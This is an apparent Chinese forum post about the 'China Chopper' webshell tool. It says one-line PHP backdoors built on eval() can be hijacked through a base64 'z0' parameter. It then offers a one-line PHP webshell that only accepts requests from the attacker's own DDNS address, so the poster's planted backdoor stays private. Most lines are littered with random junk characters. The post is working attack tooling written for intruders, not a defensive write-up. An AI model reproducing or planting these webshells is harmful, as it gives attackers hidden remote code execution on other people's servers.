今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
% o Q5 J- d3 A1 T; S9 r. c9 s/ z
就算你设置了密码,使用了eval($_REQUEST['moyo']);) j( U' v: i; }6 C+ t
+ ] a1 V, F/ B4 a- U0 |但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门( K' _7 @& r; s, x
: ?9 A8 l8 y5 I- g
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));4 R& _3 o/ Y, @( ^! S
! ~2 b( V/ Z( w- y) d直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了! |: o* j+ G4 h8 }6 J$ o
/ R% |7 L: K* t7 s- P不知道是设计缺陷还是故意留的后门5 [7 b) z" G) B' O2 A/ w& z" C
# U5 H: c* `8 y1 C. d如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
% g& ^! j! o- u: \- E; f! u9 c7 K1 m* j. S |5 n+ J# e
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org& c- B7 O9 o, }. I: c; | Z
* z$ \5 L) C% R- K$ r然后一句话后门这样写
6 {6 D- H, Y" o a" `- f6 ^9 q0 h9 V- m
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
' o( E3 V$ g% r( v这样就可以让一句话后门只允许自己的电脑连接了 v: \8 P. l# R* {9 d2 S/ J
+ L; b4 [& j/ `5 \' }* S0 f
|